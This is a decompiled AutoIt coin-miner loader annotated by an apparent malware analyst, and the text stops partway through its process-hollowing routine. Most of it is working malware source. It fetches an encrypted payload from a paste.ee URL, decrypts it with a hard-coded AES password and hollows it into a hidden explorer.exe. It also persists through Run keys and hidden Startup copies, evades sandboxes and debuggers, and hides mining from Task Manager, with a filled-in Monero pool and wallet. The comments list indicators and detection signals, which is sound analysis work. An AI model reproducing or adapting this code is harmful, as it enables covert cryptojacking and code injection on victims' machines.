- ; Decompiled AutoIt build directives. #NoTrayIcon hides the interpreter's tray icon so the
- ; running script shows no visible UI; the wrapper directives request UPX packing of the
- ; compiled binary (compression level 4). Both are common in dropper samples and are a useful
- ; static triage signal alongside the wallet/pool strings further down.
- #NoTrayIcon
- #Region
- #AutoIt3Wrapper_Compression=4
- #AutoIt3Wrapper_UseUpx=y
- #EndRegion
- ; _3(): Win32 GetLastError() helper.
- ; Returns the kernel32 GetLastError value while preserving the caller's @ERROR/@EXTENDED
- ; (defaults capture them at call time, then SETERROR re-applies them). Used by the crypt
- ; wrappers below to surface the real Win32 failure code in @EXTENDED.
- FUNC _3(CONST $0=@ERROR,CONST $1=@EXTENDED)
- LOCAL $2=DLLCALL("kernel32.dll","dword","GetLastError")
- RETURN SETERROR($0,$1,$2[0])
- ENDFUNC
- ; Struct layout strings (obfuscated names; identified from their field lists):
- ;   $3 = RECT, $4 = REBARBANDINFO (not referenced in the visible code),
- ;   $5 = SECURITY_ATTRIBUTES (used by the mutex helper), $6 = OSVERSIONINFOW.
- ; $7 caches the packed OS version (major<<8 | minor) at script start.
- GLOBAL CONST $3="struct;long Left;long Top;long Right;long Bottom;endstruct"
- GLOBAL CONST $4="uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;"&"int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;"&"uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader"&((@OSVERSION="WIN_XP")""";"&$3&";uint uChevronState")
- GLOBAL CONST $5="dword Length;ptr Descriptor;bool InheritHandle"
- GLOBAL CONST $6="struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct"
- GLOBAL CONST $7=_1V()
- ; _1V(): query the OS version via GetVersionExW.
- ; Returns (MajorVersion << 8) | MinorVersion, or 0 with @ERROR set when the call fails.
- ; The result ($7) is only computed, never consumed, in the visible code.
- FUNC _1V()
- LOCAL $8=DLLSTRUCTCREATE($6)
- DLLSTRUCTSETDATA($8,1,DLLSTRUCTGETSIZE($8))
- LOCAL $9=DLLCALL("kernel32.dll","bool","GetVersionExW","struct*",$8)
- IF @ERROR OR NOT $9[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- RETURN BITOR(BITSHIFT(DLLSTRUCTGETDATA($8,2),-8),DLLSTRUCTGETDATA($8,3))
- ENDFUNC
- ; _53($url, $asString=TRUE): download $url with INETREAD (option 1 = bypass cache).
- ; Returns the body as a string when $asString is TRUE/Default, otherwise raw binary;
- ; @ERROR/@EXTENDED from INETREAD are propagated. This is the stage-2 fetch used at the
- ; bottom of the script, so the outbound request to the paste host is the first network IoC.
- FUNC _53($A,$B=TRUE )
- LOCAL $C=INETREAD($A,1)
- LOCAL $D=@ERROR,$E=@EXTENDED
- IF $B=DEFAULT OR $B THEN $C=BINARYTOSTRING($C)
- RETURN SETERROR($D,$E,$C)
- ENDFUNC
- ; $F = -268435456 = 0xF0000000 (signed 32-bit) = CRYPT_VERIFYCONTEXT: ephemeral CSP
- ; context, no persistent key container is created on disk.
- ; $G[3] is the crypt state: [0] reference count, [1] advapi32 DLL handle, [2] HCRYPTPROV.
- GLOBAL CONST $F=-268435456
- GLOBAL $G[3]
- ; _5A(): reference-counted CryptoAPI start-up (equivalent of the Crypt.au3 _Crypt_Startup).
- ; On first use it loads Advapi32.dll and calls CryptAcquireContext with provider type 24
- ; (PROV_RSA_AES) and flags $F (CRYPT_VERIFYCONTEXT). Returns TRUE on success; FALSE with
- ; @ERROR 1001 (DllOpen failed) or 1002+ (acquire failed, Win32 code in @EXTENDED).
- FUNC _5A()
- IF _5L()=0 THEN
- LOCAL $H=DLLOPEN("Advapi32.dll")
- IF $H=-1 THEN RETURN SETERROR(1001,0,FALSE )
- _5P($H)
- LOCAL $I=24
- LOCAL $9=DLLCALL(_5O(),"bool","CryptAcquireContext","handle*",0,"ptr",0,"ptr",0,"dword",$I,"dword",$F)
- IF @ERROR OR NOT $9[0]THEN
- LOCAL $D=@ERROR+1002,$E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- DLLCLOSE(_5O())
- RETURN SETERROR($D,$E,FALSE )
- ELSE
- _5R($9[1])
- ENDIF
- ENDIF
- _5M()
- RETURN TRUE
- ENDFUNC
- ; _5B(): reference-counted CryptoAPI shutdown. Decrements the use count and, when it
- ; reaches zero, releases the provider handle and closes Advapi32.dll.
- FUNC _5B()
- _5N()
- IF _5L()=0 THEN
- DLLCALL(_5O(),"bool","CryptReleaseContext","handle",_5Q(),"dword",0)
- DLLCLOSE(_5O())
- ENDIF
- ENDFUNC
- ; _5C($password, $algId, $hashAlg=32771): derive a symmetric key from a password.
- ; $L default 32771 = 0x8003 = CALG_MD5. Sequence: CryptCreateHash → CryptHashData over the
- ; password bytes → CryptDeriveKey($algId, flags 1 = CRYPT_EXPORTABLE). Returns the key
- ; handle, or -1 with @ERROR in the ranges 10+/20+/30+ for the three API steps respectively
- ; (Win32 code in @EXTENDED). The hash object is always destroyed on the way out.
- ; Note: the key is a plain MD5-of-password derivation, not a salted/iterated KDF.
- FUNC _5C($J,$K,$L=32771)
- LOCAL $9=0,$M=0,$N=0,$D=0,$E=0,$O=0
- _5A()
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
- DO
- $9=DLLCALL(_5O(),"bool","CryptCreateHash","handle",_5Q(),"uint",$L,"ptr",0,"dword",0,"handle*",0)
- IF @ERROR OR NOT $9[0]THEN
- $D=@ERROR+10
- $E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- $O=-1
- EXITLOOP
- ENDIF
- $N=$9[5]
- $M=DLLSTRUCTCREATE("byte["&BINARYLEN($J)&"]")
- DLLSTRUCTSETDATA($M,1,$J)
- $9=DLLCALL(_5O(),"bool","CryptHashData","handle",$N,"struct*",$M,"dword",DLLSTRUCTGETSIZE($M),"dword",1)
- IF @ERROR OR NOT $9[0]THEN
- $D=@ERROR+20
- $E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- $O=-1
- EXITLOOP
- ENDIF
- $9=DLLCALL(_5O(),"bool","CryptDeriveKey","handle",_5Q(),"uint",$K,"handle",$N,"dword",1,"handle*",0)
- IF @ERROR OR NOT $9[0]THEN
- $D=@ERROR+30
- $E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- $O=-1
- EXITLOOP
- ENDIF
- $O=$9[5]
- UNTIL TRUE
- IF $N<>0 THEN DLLCALL(_5O(),"bool","CryptDestroyHash","handle",$N)
- RETURN SETERROR($D,$E,$O)
- ENDFUNC
- ; _5D($hKey): CryptDestroyKey wrapper that also drops one crypt-context reference.
- ; Returns TRUE, or FALSE with @ERROR = 10 + DllCall error and the Win32 code in @EXTENDED.
- FUNC _5D($P)
- LOCAL $9=DLLCALL(_5O(),"bool","CryptDestroyKey","handle",$P)
- LOCAL $D=@ERROR,$E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- _5B()
- IF $D OR NOT $9[0]THEN
- RETURN SETERROR($D+10,$E,FALSE )
- ELSE
- RETURN TRUE
- ENDIF
- ENDFUNC
- ; _5F($data, $keyOrPassword, $algId, $final=TRUE): CryptDecrypt wrapper.
- ; $K = 0 means $R is already a key handle; otherwise a key is derived from the password $R
- ; with _5C and destroyed afterwards. 26625 = 0x6801 = CALG_RC4, for which empty input is a
- ; no-op. The ciphertext is copied into a buffer of len+1000 bytes and decrypted in place;
- ; the plaintext is returned as binary, or -1 with @ERROR 70+ on CryptDecrypt failure.
- ; The main script calls this with $K = 26128 = 0x6610 = CALG_AES_256.
- FUNC _5F($Q,$R,$K,$S=TRUE )
- SWITCH $K
- CASE 0
- LOCAL $T=_5S($R)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
- IF $T=26625 THEN CONTINUECASE
- CASE 26625
- IF BINARYLEN($Q)=0 THEN RETURN SETERROR(0,0,BINARY(""))
- ENDSWITCH
- LOCAL $9=0,$M=0,$U=0,$D=0,$E=0,$V=0,$O=0
- _5A()
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
- DO
- IF $K<>0 THEN
- $R=_5C($R,$K)
- IF @ERROR THEN
- $D=@ERROR
- $E=@EXTENDED
- $O=-1
- EXITLOOP
- ENDIF
- ENDIF
- $M=DLLSTRUCTCREATE("byte["&BINARYLEN($Q)+1000&"]")
- IF BINARYLEN($Q)>0 THEN DLLSTRUCTSETDATA($M,1,$Q)
- $9=DLLCALL(_5O(),"bool","CryptDecrypt","handle",$R,"handle",0,"bool",$S,"dword",0,"struct*",$M,"dword*",BINARYLEN($Q))
- IF @ERROR OR NOT $9[0]THEN
- $D=@ERROR+70
- $E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- $O=-1
- EXITLOOP
- ENDIF
- $V=$9[6]
- $U=DLLSTRUCTCREATE("byte["&$V+1&"]",DLLSTRUCTGETPTR($M))
- $O=BINARYMID(DLLSTRUCTGETDATA($U,1),1,$V)
- UNTIL TRUE
- IF $K<>0 THEN _5D($R)
- _5B()
- RETURN SETERROR($D,$E,$O)
- ENDFUNC
- ; _5L(): current crypt-context reference count ($G[0]).
- FUNC _5L()
- RETURN $G[0]
- ENDFUNC
- ; _5M(): increment the crypt-context reference count.
- FUNC _5M()
- $G[0]+=1
- ENDFUNC
- ; _5N(): decrement the crypt-context reference count, never below zero.
- FUNC _5N()
- IF $G[0]>0 THEN $G[0]-=1
- ENDFUNC
- ; _5O(): the DllOpen handle for Advapi32.dll ($G[1]).
- FUNC _5O()
- RETURN $G[1]
- ENDFUNC
- ; _5P($hDll): store the Advapi32.dll handle.
- FUNC _5P($H)
- $G[1]=$H
- ENDFUNC
- ; _5Q(): the acquired HCRYPTPROV ($G[2]).
- FUNC _5Q()
- RETURN $G[2]
- ENDFUNC
- ; _5R($hProv): store the HCRYPTPROV.
- FUNC _5R($W)
- $G[2]=$W
- ENDFUNC
- ; _5S($hKey): read the algorithm id of a key (CryptGetKeyParam, dwParam 7 = KP_ALGID).
- ; Returns the ALG_ID, or 1 with @ERROR 80+ on failure.
- FUNC _5S($R)
- LOCAL $X=DLLSTRUCTCREATE("uint")
- LOCAL $9=DLLCALL(_5O(),"bool","CryptGetKeyParam","handle",$R,"dword",7,"struct*",$X,"dword*",DLLSTRUCTGETSIZE($X),"dword",0)
- LOCAL $D=@ERROR,$E=@EXTENDED
- IF NOT $9[0]THEN $E=_3()
- IF $D OR NOT $9[0]THEN
- RETURN SETERROR($D+80,$E,1)
- ELSE
- RETURN DLLSTRUCTGETDATA($X,1)
- ENDIF
- ENDFUNC
- ; _5U(): milliseconds since the last user keyboard/mouse input (GetLastInputInfo vs
- ; GetTickCount). Returns 0 with @ERROR on API failure; on tick-count wrap-around it returns
- ; the raw tick count with @EXTENDED = 1. The caller uses this to detect an idle machine.
- FUNC _5U()
- LOCAL $Y=DLLSTRUCTCREATE("uint;dword")
- DLLSTRUCTSETDATA($Y,1,DLLSTRUCTGETSIZE($Y))
- LOCAL $2=DLLCALL("user32.dll","bool","GetLastInputInfo","struct*",$Y)
- IF @ERROR OR $2[0]=0 THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- LOCAL $0Z=DLLCALL("kernel32.dll","dword","GetTickCount")
- IF @ERROR OR NOT $2[0]THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- LOCAL $10=$0Z[0]-DLLSTRUCTGETDATA($Y,2)
- IF $10<0 THEN RETURN SETEXTENDED(1,$0Z[0])
- RETURN $10
- ENDFUNC
- ; _66($mutexName, $flags=0): single-instance guard built on CreateMutexW.
- ; $flags bit 1: if the mutex already exists (GetLastError = 183 = ERROR_ALREADY_EXISTS)
- ;   return 0 instead of exiting the process. $flags bit 2: create the mutex with a NULL DACL
- ;   so it is visible across sessions/users.
- ; Returns the mutex handle, 0 when another instance holds it (with bit 1), else EXITs -1.
- ; The named mutexes created by this sample ("ixhost", "ixkiller") are host-based IoCs.
- FUNC _66($11,$12=0)
- LOCAL CONST $13=183
- LOCAL CONST $14=1
- LOCAL $15=0
- IF BITAND($12,2)THEN
- LOCAL $16=DLLSTRUCTCREATE("byte;byte;word;ptr[4]")
- LOCAL $9=DLLCALL("advapi32.dll","bool","InitializeSecurityDescriptor","struct*",$16,"dword",$14)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- IF $9[0]THEN
- $9=DLLCALL("advapi32.dll","bool","SetSecurityDescriptorDacl","struct*",$16,"bool",1,"ptr",0,"bool",0)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- IF $9[0]THEN
- $15=DLLSTRUCTCREATE($5)
- DLLSTRUCTSETDATA($15,1,DLLSTRUCTGETSIZE($15))
- DLLSTRUCTSETDATA($15,2,DLLSTRUCTGETPTR($16))
- DLLSTRUCTSETDATA($15,3,0)
- ENDIF
- ENDIF
- ENDIF
- LOCAL $17=DLLCALL("kernel32.dll","handle","CreateMutexW","struct*",$15,"bool",1,"wstr",$11)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- LOCAL $18=DLLCALL("kernel32.dll","dword","GetLastError")
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- IF $18[0]=$13 THEN
- IF BITAND($12,1)THEN
- DLLCALL("kernel32.dll","bool","CloseHandle","handle",$17[0])
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
- RETURN SETERROR($18[0],$18[0],0)
- ELSE
- EXIT -1
- ENDIF
- ENDIF
- RETURN $17[0]
- ENDFUNC
- ; ---- Main script: coin-miner loader ----
- ; Host IoCs visible here: mutexes "ixhost" / "ixkiller"; Run-key value name "UpdateScheduler";
- ; hollowing host explorer.exe (path depends on OS bitness); a hard-coded svchost.exe path
- ; that is assigned but not referenced in the visible code.
- ; Network IoCs: stage-2 download from the paste.ee URL below; miner traffic to
- ; pool.supportxmr.com:3333 with the Monero wallet in $1D. The two command lines are
- ; XMRig-style arguments: $1E = throttled (-t 1), $1F = full CPU (--max-cpu-usage=100).
- _66("ixhost",1)
- $19="UpdateScheduler"
- GLOBAL $1A
- IF @OSARCH="X86" THEN
- $1A=@WINDOWSDIR&"\explorer.exe"
- ELSE
- $1A=@SYSTEMDIR&"\explorer.exe"
- ENDIF
- $1B="C:\Windows\System32\svchost.exe"
- $1C="pool.supportxmr.com:3333"
- $1D="42yzCwXHqAr2cbZ6kWU8SZJCq5H3quBAkgDd6ZZGKvvRYaPxKJ8J6GMVhGjo8pmgy74NRTvVst2ZGAk35ERgAS88NFHQQAV"
- $1E="-o "&$1C&" -u "&$1D&" -p x -k -t 1 --nicehash"
- $1F="-o "&$1C&" -u "&$1D&" -p x -k --max-cpu-usage=100 --nicehash"
- ; "ixkiller" mutex acquire returning 0 means another copy owns it; this copy then closes
- ; any process with its own script name (a self-replacement/kill-switch mechanism).
- IF _66("ixkiller",1)=0 THEN
- IF PROCESSEXISTS(@SCRIPTNAME)THEN
- PROCESSCLOSE(@SCRIPTNAME)
- ENDIF
- ENDIF
- ; Stage 2: fetch the encrypted miner blob and decrypt it with AES-256 (26128 = CALG_AES_256)
- ; under a key derived from the literal password "ix32". $1H holds the in-memory PE image
- ; that _6G later injects; it is never written to disk in the visible code.
- $1G=_53("https://paste.ee/r/LG8VC/0")
- $1H=_5F($1G,"ix32",26128)
- $1I=""
- ; Result of the sleep/tick-count probe is discarded here.
- _6E(1000)
- ; Main loop: anti-analysis check (_6F/_6C), persistence (_6D), miner start/stop (_6F).
- WHILE 1
- GUIGETMSG()
- _6F()
- _6D($19)
- _6C()
- WEND
- ; _6C(): anti-analysis exit. Terminates the script if the Sandboxie control process is
- ; running or if windows belonging to PEiD, OllyDbg, Exe2Aut or myAut2Exe (AutoIt
- ; decompilers) are present. The "Program Manager" check matches the desktop window
- ; title; its intent is not clear from the code alone.
- FUNC _6C()
- IF PROCESSEXISTS("SbieCtrl.exe")OR WINGETTEXT("Sanboxie Control")OR WINGETTEXT("PEiD")OR WINGETTEXT("ollydbg")OR WINGETTEXT("exetoaut")OR WINGETTEXT("myAutToExe")OR WINGETTEXT("Program Manager")THEN
- EXIT
- ENDIF
- ENDFUNC
- ; _6D($runValueName): persistence, re-checked on every loop iteration.
- ; Elevated: copies itself to %WINDIR% and registers an HKLM Run value.
- ; Non-elevated: copies itself to the user's Startup folder and the common Documents folder,
- ;   registers an HKCU Run value (the second REGWRITE overwrites the first, so the effective
- ;   Run target is the Documents copy), marks both copies System+Hidden, and sets Explorer
- ;   policies (NoFolderOptions=1, ShowSuperHidden=0) so the hidden copies stay invisible.
- ; Detection: Run-key writes plus the ShowSuperHidden/NoFolderOptions policy changes from a
- ; non-installer process are a strong combined signal.
- FUNC _6D($19)
- IF ISADMIN()=1 THEN
- IF FILEEXISTS(@WINDOWSDIR&"\"&@SCRIPTNAME)=FALSE THEN
- FILECOPY(@SCRIPTFULLPATH,@WINDOWSDIR&"\"&@SCRIPTNAME)
- ENDIF
- IF REGREAD("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
- REGWRITE("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@WINDOWSDIR&"\"&@SCRIPTNAME)
- ENDIF
- ELSE
- IF FILEEXISTS(@STARTUPDIR&"\"&@SCRIPTNAME)=FALSE THEN
- FILECOPY(@SCRIPTFULLPATH,@STARTUPDIR&"\"&@SCRIPTNAME)
- FILECOPY(@SCRIPTFULLPATH,@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
- ENDIF
- IF REGREAD("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19)="" THEN
- REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@STARTUPDIR&"\"&@SCRIPTNAME)
- REGWRITE("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",$19,"REG_SZ",@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME)
- FILESETATTRIB(@STARTUPDIR&"\"&@SCRIPTNAME,"+SH")
- FILESETATTRIB(@DOCUMENTSCOMMONDIR&"\"&@SCRIPTNAME,"+SH")
- REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoFolderOptions","REG_DWORD",1)
- REGWRITE("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","ShowSuperHidden","REG_DWORD",0)
- ENDIF
- ENDIF
- ENDFUNC
- ; _6E($ms): sleep for $ms and compare the GetTickCount delta with the requested value.
- ; Returns FALSE only when the delta is exactly $ms, TRUE otherwise. The shape matches a
- ; sandbox "sleep skipping" probe, but the caller discards the result, so it has no effect
- ; on control flow in the visible code.
- FUNC _6E($1J)
- LOCAL $1K=DLLCALL("kernel32.dll","dword","GetTickCount")
- SLEEP($1J)
- LOCAL $1L=DLLCALL("kernel32.dll","dword","GetTickCount")
- IF $1L[0]-$1K[0]=$1J THEN
- RETURN FALSE
- ELSE
- RETURN TRUE
- ENDIF
- ENDFUNC
- ; _6F(): miner scheduler, called every loop iteration. Uses globals $1A (explorer.exe host
- ; path), $1H (decrypted miner image), $1E/$1F (throttled/full command lines) and $1I
- ; (current mode: "", "low" or "high").
- ; - If Task Manager, Process Explorer/Monitor or any of the listed games (or a "FIFA" window)
- ;   is running, the hollowed explorer.exe host is killed so CPU load is not noticed.
- ; - If the user has been idle for more than 50 s (and no madVR/Sling process is running),
- ;   the miner is (re)launched with the full-CPU arguments; otherwise with the throttled ones.
- ; - If the host process has disappeared it is relaunched in throttled mode.
- ; Detection: explorer.exe spawned by this script with a hidden window and miner-style
- ; arguments, repeatedly killed and restarted, is the behavioural signature.
- FUNC _6F()
- $1M=_5U()
- IF PROCESSEXISTS("Taskmgr.exe")OR PROCESSEXISTS("procexp.exe")OR PROCESSEXISTS("procexp64.exe")OR PROCESSEXISTS("procmon.exe")OR PROCESSEXISTS("FortniteClient-Win64-Shipping.exe")OR PROCESSEXISTS("bf1.exe")OR PROCESSEXISTS("bf4.exe")OR PROCESSEXISTS("bf4_x86.exe")OR PROCESSEXISTS("NFS16.exe")OR PROCESSEXISTS("NFS16_trial.exe")OR PROCESSEXISTS("Overwatch.exe")OR PROCESSEXISTS("csgo.exe")OR PROCESSEXISTS("argo.exe")OR PROCESSEXISTS("dota2.exe")OR PROCESSEXISTS("rust.exe")OR PROCESSEXISTS("argo_x64.exe")OR PROCESSEXISTS("arma3.exe")OR PROCESSEXISTS("arma3_x64.exe")OR PROCESSEXISTS("Creativerse.exe")OR PROCESSEXISTS("hl2.exe")OR PROCESSEXISTS("GTA5.exe")OR PROCESSEXISTS("insurgency.exe")OR PROCESSEXISTS("insurgency_64.exe")OR PROCESSEXISTS("paladins.exe")OR PROCESSEXISTS("TslGame.exe")OR PROCESSEXISTS("Unturned.exe")OR WINEXISTS("FIFA")THEN
- WINKILL($1A)
- SLEEP(10)
- ELSE
- IF $1M>50000 THEN
- IF NOT PROCESSEXISTS("madHcCtrl.exe")AND NOT PROCESSEXISTS("Sling.exe")THEN
- IF $1I="low" THEN
- WINKILL($1A)
- _6G($1H,$1F,$1A)
- SLEEP(5000)
- $1I="high"
- ELSEIF $1I="" THEN
- _6G($1H,$1F,$1A)
- SLEEP(5000)
- $1I="high"
- ENDIF
- ELSEIF $1I="high" THEN
- _6G($1H,$1E,$1A)
- SLEEP(5000)
- $1I="low"
- ELSEIF $1I="" THEN
- _6G($1H,$1E,$1A)
- SLEEP(5000)
- $1I="low"
- ENDIF
- ELSEIF $1I="high" THEN
- WINKILL($1A)
- _6G($1H,$1E,$1A)
- SLEEP(5000)
- $1I="low"
- ELSEIF $1I="" THEN
- _6G($1H,$1E,$1A)
- SLEEP(5000)
- $1I="low"
- ELSEIF NOT WINEXISTS($1A)THEN
- _6G($1H,$1E,$1A)
- SLEEP(3000)
- ENDIF
- ENDIF
- ENDFUNC
- ; _6G($peImage, $cmdLine=0, $hostPath=0): process hollowing ("RunPE") loader.
- ; Creates $hostPath suspended (dwCreationFlags 4 = CREATE_SUSPENDED, window hidden via
- ; STARTUPINFO), maps the in-memory PE $peImage over the host's image, patches the PEB and
- ; thread context, and resumes it. Returns the child PID, or 0 with @ERROR 1..11 / 101 / 102
- ; identifying the failed step; on any failure after creation the child is terminated.
- ; Detection/telemetry for defenders: the API sequence CreateProcessW(SUSPENDED) →
- ; GetThreadContext → ReadProcessMemory(PEB) → NtUnmapViewOfSection → VirtualAllocEx(RWX) →
- ; WriteProcessMemory → SetThreadContext → ResumeThread from an AutoIt-compiled parent is
- ; the canonical hollowing pattern; the resulting explorer.exe has an image that does not
- ; match its on-disk file, which memory scanners flag. The WriteProcessMemory import name is
- ; assembled at runtime by _6H to defeat static string matching.
- FUNC _6G($1N,$1O=0,$1P=0)
- LOCAL $1Q=@AUTOITX64
- LOCAL $1R=BINARY($1N)
- LOCAL $1S=DLLSTRUCTCREATE("byte["&BINARYLEN($1R)&"]")
- DLLSTRUCTSETDATA($1S,1,$1R)
- LOCAL $1T=DLLSTRUCTGETPTR($1S)
- ; STARTUPINFOW with STARTF_USESHOWWINDOW (Flags=1) and wShowWindow=SW_HIDE.
- LOCAL $1U=DLLSTRUCTCREATE("dword cbSize;"&"ptr Reserved;"&"ptr Desktop;"&"ptr Title;"&"dword X;"&"dword Y;"&"dword XSize;"&"dword YSize;"&"dword XCountChars;"&"dword YCountChars;"&"dword FillAttribute;"&"dword Flags;"&"word ShowWindow;"&"word Reserved2;"&"ptr Reserved2;"&"ptr hStdInput;"&"ptr hStdOutput;"&"ptr hStdError")
- DLLSTRUCTSETDATA($1U,"Flags",1)
- DLLSTRUCTSETDATA($1U,"ShowWindow",@SW_HIDE)
- LOCAL $1V=DLLSTRUCTCREATE("ptr Process;"&"ptr Thread;"&"dword ProcessId;"&"dword ThreadId")
- IF $1O THEN $1O=$1P&" "&$1O
- ; Step 1: create the host suspended.
- LOCAL $1W=DLLCALL("kernel32.dll","bool","CreateProcessW","wstr",$1P,"wstr",$1O,"ptr",0,"ptr",0,"int",0,"dword",4,"ptr",0,"ptr",0,"ptr",DLLSTRUCTGETPTR($1U),"ptr",DLLSTRUCTGETPTR($1V))
- IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
- LOCAL $1X=DLLSTRUCTGETDATA($1V,"Process")
- LOCAL $1Y=DLLSTRUCTGETDATA($1V,"Thread")
- ; A 64-bit loader refuses a WOW64 (32-bit) host.
- IF $1Q AND _6M($1X)THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(2,0,0)
- ENDIF
- ; $1Z selects the CONTEXT layout: 1 = x86, 2 = x64; 3 is an unsupported combination.
- LOCAL $1Z,$20
- IF $1Q THEN
- IF @OSARCH="X64" THEN
- $1Z=2
- $20=DLLSTRUCTCREATE("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;"&"dword ContextFlags; dword MxCsr;"&"word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;"&"uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;"&"uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;"&"uint64 Rip;"&"uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];"&"uint64 VectorRegister[52]; uint64 VectorControl;"&"uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
- ELSE
- $1Z=3
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(102,0,0)
- ENDIF
- ELSE
- $1Z=1
- $20=DLLSTRUCTCREATE("dword ContextFlags;"&"dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;"&"dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;"&"dword SegGs; dword SegFs; dword SegEs; dword SegDs;"&"dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;"&"dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;"&"byte ExtendedRegisters[512]")
- ENDIF
- ; ContextFlags: 65543 = 0x10007 (CONTEXT_i386 | control/integer/segments),
- ; 1048583 = 0x100007 (CONTEXT_AMD64 | control/integer/segments).
- LOCAL $21
- SWITCH $1Z
- CASE 1
- $21=65543
- CASE 2
- $21=1048583
- CASE 3
- $21=524327
- ENDSWITCH
- DLLSTRUCTSETDATA($20,"ContextFlags",$21)
- ; Step 2: read the suspended main thread's initial context.
- $1W=DLLCALL("kernel32.dll","bool","GetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
- IF @ERROR OR NOT $1W[0]THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(3,0,0)
- ENDIF
- ; $22 = PEB address of the child (Ebx on x86, Rdx on x64 at process start).
- LOCAL $22
- SWITCH $1Z
- CASE 1
- $22=DLLSTRUCTGETDATA($20,"Ebx")
- CASE 2
- $22=DLLSTRUCTGETDATA($20,"Rdx")
- CASE 3
- ENDSWITCH
- ; Step 3: parse the payload's DOS header ("MZ"), PE signature (17744 = 0x4550 = "PE\0\0"),
- ; COFF file header and optional header. $24 keeps the image start; $1T walks the headers.
- LOCAL $23=DLLSTRUCTCREATE("char Magic[2];"&"word BytesOnLastPage;"&"word Pages;"&"word Relocations;"&"word SizeofHeader;"&"word MinimumExtra;"&"word MaximumExtra;"&"word SS;"&"word SP;"&"word Checksum;"&"word IP;"&"word CS;"&"word Relocation;"&"word Overlay;"&"char Reserved[8];"&"word OEMIdentifier;"&"word OEMInformation;"&"char Reserved2[20];"&"dword AddressOfNewExeHeader",$1T)
- LOCAL $24=$1T
- $1T+=DLLSTRUCTGETDATA($23,"AddressOfNewExeHeader")
- LOCAL $25=DLLSTRUCTGETDATA($23,"Magic")
- IF NOT ($25=="MZ")THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(4,0,0)
- ENDIF
- LOCAL $26=DLLSTRUCTCREATE("dword Signature",$1T)
- $1T+=4
- IF DLLSTRUCTGETDATA($26,"Signature")<>17744 THEN
- DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
- RETURN SETERROR(5,0,0)
- ENDIF
- LOCAL $27=DLLSTRUCTCREATE("word Machine;"&"word NumberOfSections;"&"dword TimeDateStamp;"&"dword PointerToSymbolTable;"&"dword NumberOfSymbols;"&"word SizeOfOptionalHeader;"&"word Characteristics",$1T)
- LOCAL $28=DLLSTRUCTGETDATA($27,"NumberOfSections")
- $1T+=20
